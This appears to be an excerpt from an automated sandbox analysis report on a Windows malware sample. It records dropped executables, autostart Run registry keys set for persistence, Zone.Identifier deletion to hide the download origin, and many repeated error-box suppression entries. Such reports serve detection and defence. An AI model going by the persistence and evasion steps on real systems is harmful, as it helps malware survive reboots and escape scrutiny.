                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeJump to dropped file

                Boot Survival

                barindex
                Creates multiple autostart registry keys
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QasvjoldkyhJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QasvjoldkyhJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QasvjoldkyhJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeFile opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
